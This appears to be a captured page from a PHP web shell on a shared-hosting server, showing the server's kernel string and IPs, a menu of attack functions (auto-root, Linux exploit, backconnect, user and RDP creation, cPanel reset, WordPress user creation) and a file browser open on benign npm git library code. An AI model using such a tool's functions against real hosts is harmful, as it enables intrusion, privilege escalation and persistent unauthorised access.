Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.21.159.11
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
node_modules.bundled /
@npmcli /
git /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
clone.js
4.78
KB
-rw-r--r--
errors.js
600
B
-rw-r--r--
find.js
300
B
-rw-r--r--
index.js
242
B
-rw-r--r--
is-clean.js
222
B
-rw-r--r--
is.js
271
B
-rw-r--r--
lines-to-revs.js
3.97
KB
-rw-r--r--
make-error.js
861
B
-rw-r--r--
opts.js
371
B
-rw-r--r--
revs.js
638
B
-rw-r--r--
spawn.js
1.27
KB
-rw-r--r--
utils.js
109
B
-rw-r--r--
which.js
339
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : make-error.js
const { GitConnectionError, GitPathspecError, GitUnknownError, } = require('./errors.js') const connectionErrorRe = new RegExp([ 'remote error: Internal Server Error', 'The remote end hung up unexpectedly', 'Connection timed out', 'Operation timed out', 'Failed to connect to .* Timed out', 'Connection reset by peer', 'SSL_ERROR_SYSCALL', 'The requested URL returned error: 503', ].join('|')) const missingPathspecRe = /pathspec .* did not match any file\(s\) known to git/ function makeError (er) { const message = er.stderr let gitEr if (connectionErrorRe.test(message)) { gitEr = new GitConnectionError(message) } else if (missingPathspecRe.test(message)) { gitEr = new GitPathspecError(message) } else { gitEr = new GitUnknownError(message) } return Object.assign(gitEr, er) } module.exports = makeError
Close